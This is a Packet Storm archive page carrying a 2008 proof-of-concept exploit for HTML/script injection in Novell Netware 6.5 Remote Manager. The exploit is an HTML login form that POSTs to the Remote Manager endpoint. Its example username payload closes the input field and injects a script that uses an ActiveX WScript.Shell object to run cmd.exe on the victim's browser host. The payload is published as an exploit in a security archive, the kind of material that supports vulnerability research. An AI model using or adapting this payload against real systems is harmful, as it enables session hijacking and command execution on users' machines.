exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

netbeware.txt

netbeware.txt
Posted Aug 22, 2008
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

The remote manager in Novell Netware version 6.5 suffers from an HTML injection vulnerability.

tags | exploit, remote
SHA-256 | d55104ed15bb268ae818564d5a27a9f645fab016c404a789b83dd37ee602b8f7

netbeware.txt

Change Mirror Download
<!--- Jeremy Brown (0xjbrown41@gmail.com)
Novell Netware 6.5's Remote Manager is vulnerable to script injection, session-wise,
via the client browser. A specially crafted POST command to the server will inject
data in the client's current session. Server will not resume normal operations
via the client until session is cleared or another browser is used (IE vs. FF). --->

<html>
<FORM method=POST action="https://192.168.1.201:8009/_LOGIN_SERVER2_"
name="authenticator">
<center>Novell Netware 6.5 Remote Manager HTML Injection Exploit</center>
<br><br>
Username: <input type="text" name="usr"><br>
Password: <input type="text" name="pwd"><br><br>
<input type="submit" name="login" value="LOGIN">
<br><br><center>Example --> Username: "><script>var ex=new ActiveXObject("WScript.Shell");ex.run('cmd.exe /C ver');</script></center>
</html>
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close